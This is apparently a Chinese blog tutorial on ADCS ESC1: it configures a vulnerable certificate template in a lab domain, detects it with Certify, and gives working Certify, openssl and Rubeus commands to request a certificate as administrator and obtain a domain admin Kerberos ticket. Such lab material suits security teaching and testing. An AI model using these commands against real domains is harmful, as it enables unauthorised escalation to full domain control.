ADCS-ESC1漏洞环境构造与利用

原理

ESC1是ADCS中的一个漏洞,利用该漏洞可实现权限提升攻击。在 ESC1 漏洞利用中,攻击者通过一系列操作获取包含域管身份信息的证书后,利用 Rubeus.exe 工具,使用该证书获取 TGT 票据。一旦成功获取 TGT 票据,攻击者就可以利用该票据进行权限提升,访问原本只有域管理员才能访问的域控资源等,从而实现对域环境的进一步控制。

漏洞利用条件

证书注册权限:Domain Users 组具备获取证书的权限。

应用程序策略:证书具备身份验证功能,例如登记为客户端身份验证,只要证书存在用于验证的相关功能,即可满足该攻击条件。

关键标志开启:开启 CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT 标志,此标志允许通过_CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT_声明自身身份,从而实现伪装成域管理员的目的,这是 ESC1 攻击得以实施的关键步骤。

漏洞环境构造

配置证书模板

在ADCS服务器中运行中输入certtmpl.msc打开证书模板控制台,右键复制工作站身份验证

常规

模板名称设置为ESC1(可任意填写)

使用者名称

选择在请求中提供,开启CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT

拓展

选择应用程序策略,添加客户端身份验证

安全

加入Domain Users具有注册权限

发布证书模板

打开certsrv.msc

在证书颁发机构中的证书模板右键点击新建要颁发的证书模板,选择新复制的模板ESC1确定添加

漏洞环境检测

使用Certify检测有没有证书配置错误

复制代码
Certify.exe find /vulnerable

当出现以下情况时,满足 ESC1 漏洞条件,即存在 ESC1 漏洞:

  1. msPKI-Certificate-Name-Flag:ENROLLEE_SUPPLIES_SUBJECT
  2. pkiextendedkeyusage:客户端身份验证
  3. Enrollment Rights:Domain Users 组可获取证书

满足上述条件,可利用证书漏洞伪装成域管理员获取更高权限。

漏洞利用

在普通域用户下,使用Certify.exe以administrator身份申请ESC1证书

复制代码
Certify.exe request /ca:adcs.lutra.com\lutra-ADCS-CA /template:ESC1 /altname:administrator

将申请的证书复制保存为cert.pem,使用openssl转为cert.pfx,密码为空即可

复制代码
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

使用Rubeus请求域管administrator的TGT

复制代码
Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /dc:192.168.110.127 /ptt

在执行的时候出现报错,KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP

原因是没有将域控制器身份验证证书导入到域控中

将域控制器身份验证注册后再次执行,成功导入票据

导入票据后,已经有权限访问域控目录

相关推荐
你的人类朋友13 小时前
什么是API签名?
前端·后端·安全
深盾安全18 小时前
ProGuard混淆在Android程序中的应用
安全
CYRUS_STUDIO19 小时前
利用 Linux 信号机制(SIGTRAP)实现 Android 下的反调试
android·安全·逆向
白帽黑客沐瑶1 天前
【网络安全就业】信息安全专业的就业前景(非常详细)零基础入门到精通,收藏这篇就够了
网络·安全·web安全·计算机·程序员·编程·网络安全就业
深盾安全1 天前
符号执行技术实践-求解程序密码
安全
贾维思基1 天前
被监管警告后,我连夜给系统上了“双保险”!
安全
00后程序员张1 天前
iOS App 混淆与加固对比 源码混淆与ipa文件混淆的区别、iOS代码保护与应用安全场景最佳实践
android·安全·ios·小程序·uni-app·iphone·webview
Devil枫1 天前
鸿蒙深链落地实战:从安全解析到异常兜底的全链路设计
安全·华为·harmonyos
lubiii_1 天前
网络安全渗透测试第一步信息收集
安全·web安全·网络安全
你的人类朋友2 天前
🔒什么是HMAC
后端·安全·程序员